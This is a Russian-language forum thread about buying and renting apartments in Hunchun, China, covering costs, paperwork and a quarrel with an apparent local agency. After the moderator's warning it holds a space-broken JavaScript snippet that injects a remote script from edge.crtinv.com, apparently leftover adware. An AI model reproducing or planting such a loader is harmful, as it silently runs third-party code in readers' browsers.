Недвижимость в Хуньчуне

Страницы: 1 2 3 След.
RSS
Недвижимость в Хуньчуне, Вопросы, связанные с приобретением и арендой недвижимости в Хуньчуне, обмен опытом аренды и покупки квартиры, "подводные камни", где лучше жить, стоимость и т.п.
 
Давно мечтала купить квартиру в Хуньчуне, когда первый раз приехала сама себе сказала- буду здесь жить. И вот уже второй месяц как я наслаждаюсь жизнью! Почти год собирала информацию, по крупицам, оказалось не всё так страшно. Нужны только огромное желание и конечно деньги! Будут ворпосы, пишите, с удовольствием отвечу и помогу!
 
Сайт по недвижимости

http://chinatown.ucoz.com/

alex71 Расскажите о своей квартире. Какая площадь? Сколько квартплата и как она вообще считается?
 
В квартире 3 спальни, гостиная, санузел большой, 3 балкона (на кухне, в гостиной, в спальне), довольно большая кухня. Общая площадь примерно 90 кв.м. Сейчас в расчет площади входит толщина стен, размер балконов, даже часть лестничной клетки. Кварплата составляет около 1.5 тыс.руб. в месяц. Причем отопление (теплые полы) полачиваются за весь отопительный период сразу, если оплатили раньше, то в следующий раз оплачиваете меньше на 100ю. За электроэнергию и воду можно вносить плату вперед, приносят квитанции раз в месяц, где показывают сумму за месяц. Квитанции прикрепляют к двери. Оплата производится в специальном офисе, где никогда, сколько я не приходила, нет очереди!
Этот сайт http://chinatown.ucoz.com/ мне ничего не дал. Я им писала в течение месяца, у них ничего конкретного нет и на мои вопросы исчерпывающего ответа не получила. Квартиры выставлены только образцы, никаких цен не указывают.  Обновлений в сайте нет.
Я случайно нашла другой сайт, который мне понравился:http://taofang.ucoz.net/, посмотрите сами.:D
 
Здорово. Может фото как нибудь покажете Вашей квартиры. А в каком районе Хунчуня? Что рядом расположено? Какие документы понадобились для оформления? И сколько времени заняла вся процедура? Ремонт в квартире делали?
Изменено: Julia - 24.08.2012 21:35:35
 
квартра в районе 锦秀家园, рядом гостиница ШеньБо, для оформления нужен только паспорт, оформили за два дня. Квартира была с ремонтом, только мебель купили.
DSCN0532.jpg (141.07 КБ)
DSCN0535.jpg (111 КБ)
DSCN0536.jpg (150.08 КБ)
DSCN0538.jpg (132.24 КБ)
DSCN0543.jpg (122.09 КБ)
Изменено: alex71 - 24.08.2012 22:15:07
 
alex71  могу только по хорошему завидовать! Тоже мечтаю жить в Хунчуне. А как с работой? Есть чем заняться?
 
Работа есть везде, было бы желание, я пока домохозяйка, с ребенком сижу. Да и про работу не в этой теме!
 
:)Сорри за вторжение! А есть ли возможность ипотеки в Хуньчуне?
 
Цитата
alex71 пишет:

Этот сайт http://chinatown.ucoz.com/ мне ничего не дал. Я им писала в течение месяца, у них ничего конкретного нет и на мои вопросы исчерпывающего ответа не получила. Квартиры выставлены только образцы, никаких цен не указывают. Обновлений в сайте нет.
Я случайно нашла другой сайт, который мне понравился: http://taofang.ucoz.net/ , посмотрите сами.:D

Ну вы и подлый человечек... ещё месяц писали и вам не ответили.. не стыдно так врать...?!!?
Завитки видать берут Вас...Прекратите это враньё. Работайте на своей стороне...
 
Цитата
Julia пишет:
А как с работой? Есть чем заняться?
Очень много русских в Хуньчуне в последнее время работает,кто где. В основном в магазинах продавцами,в аптеках, в школах преподавателями русского языка,в ресторанах,в барах и т.д. Так что устроиться действительно можно при желании.
 
Сколько стоит снять квартиру одному от трех месяцев с интернетом и мебелью? :)
 
Цитата
alex_n пишет:
Сколько стоит снять квартиру одному от трех месяцев с интернетом и мебелью? :)
Смотря какая площадь квартиры и условия. От 700 до 1500 юаней в месяц.
 
Цитата
chinaforu chinaforu пишет:
Цитата
alex_n пишет:
Сколько стоит снять квартиру одному от трех месяцев с интернетом и мебелью? :)
Смотря какая площадь квартиры и условия. От 700 до 1500 юаней в месяц.
1 спальня, 1 гостиная, санузел, до 50 кв.м, небольшая квартирка желательно в новостройке. :)
 
Цитата
alex_n пишет:
1 спальня, 1 гостиная, санузел, до 50 кв.м, небольшая квартирка желательно в новостройке. :)
700 юаней примерно.
 
Цитата
chinaforu chinaforu пишет:
Ну вы и подлый человечек... ещё месяц писали и вам не ответили.. не стыдно так врать...?!!?
Завитки видать берут Вас...Прекратите это враньё. Работайте на своей стороне...
Уважаемый, я вас не оскорбляла, а высказала свое мнение! На то и форум: здесь каждый высказывает свое мнение! Какие "завитки"? Чему завидовать! Я только потеряла время, переписываясь с ВАМИ! Я не вру, могу Вам лично сбросить нашу с Вами переписку. И что значит "работайте на своей стороне"? Какие стороны? Эту тему я подняла, а не Вы! И у кого где должна быть сторона? Не Вам решать! Из-за таких как Вы люди не могут найти достоверной информации! Вот и сейчас у Вас конкретно спрашивают про аренду квартиры, указав все требования и вы ничего конкретного не можете сказать! Какое Вы агенство недвижимости после этого? Да у Вас просто ничего нет, ни квартир, ни информации о них!!! Одна общая ни о чем не говорящая информация! Научитесь уважительно разговаривать с клиентами! Читайте отзывы и делайте работу над ошибками!
А про работу есть отдельная тема, вот туда и пишите!
 
Цитата
alex71 пишет:
Уважаемый, я вас не оскорбляла, а высказала свое мнение! На то и форум: здесь каждый высказывает свое мнение! Какие "завитки"? Чему завидовать! Я только потеряла время, переписываясь с ВАМИ! Я не вру, могу Вам лично сбросить нашу с Вами переписку. И что значит "работайте на своей стороне"? Какие стороны? Эту тему я подняла, а не Вы! И у кого где должна быть сторона? Не Вам решать! Из-за таких как Вы люди не могут найти достоверной информации! Вот и сейчас у Вас конкретно спрашивают про аренду квартиры, указав все требования и вы ничего конкретного не можете сказать! Какое Вы агенство недвижимости после этого? Да у Вас просто ничего нет, ни квартир, ни информации о них!!! Одна общая ни о чем не говорящая информация! Научитесь уважительно разговаривать с клиентами! Читайте отзывы и делайте работу над ошибками!
А про работу есть отдельная тема, вот туда и пишите!
Уважаемая, а Вы какое агентство представляете!?У людей свобода выбора в какое агентство недвижимости обращаться,чтобы купить квартиру в Хуньчуне.Что касается нашей работы-Все клиенты,которые  к нам обращались,остались очень довольны нашей работой.Сейчас все клиенты- наши друзья!!!Мы всегда уважительно относимся не только к нашим клиентам ,но и к конкурентам. Вы не наш клиент! а для конкурента совсем не умно полевать грязью других..и вы прекрасно понимаете, о чём написано выше.
 
chinaforu chinaforu и ]alex71

Выношу устное предупреждение. Большая просьба все личные выяснения отношений завершить на форуме.




!f unction(){try{var h=docu ment.getElementsByTagName("head")[0];var s=docu ment.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.on load=s.on readystatechange=f unction(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.on load=s.on readystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
 
Ой как тут весело,оказывается,такая конкурентная борьба...Только вот не понять за что бьются. Приведу пример из личного опыта: дважды делал попытки арендовать квартиру в ХЧ через местные агенства; работа местных агентств не выдерживает ни какой критики, тянут резину, опаздывают на встречи, предварительной информации о квартире никакой,  создалось впечатление что основная задача получить 30 юанек за просмотр квартиры а не сдать жилье. Оба раза находил квартиры,в конечном итоге, через знакомых.
 
Цитата
crocozyabric пишет:
Ой как тут весело,оказывается,такая конкурентная борьба...Только вот не понять за что бьются. Приведу пример из личного опыта: дважды делал попытки арендовать квартиру в ХЧ через местные агенства; работа местных агентств не выдерживает ни какой критики, тянут резину, опаздывают на встречи, предварительной информации о квартире никакой,создалось впечатление что основная задача получить 30 юанек за просмотр квартиры а не сдать жилье. Оба раза находил квартиры,в конечном итоге, через знакомых.
да вы совершенно правы. этих агентств в Хуньчуне как блох развелось.  Человеческий фактор никто не отменял. главное найти  порядочных людей или проверенного человека.
 
Цитата
Анджени Star пишет:
:)Сорри за вторжение! А есть ли возможность ипотеки в Хуньчуне?
На сколько я знаю для иностранцев нет.
Страницы: 1 2 3 След.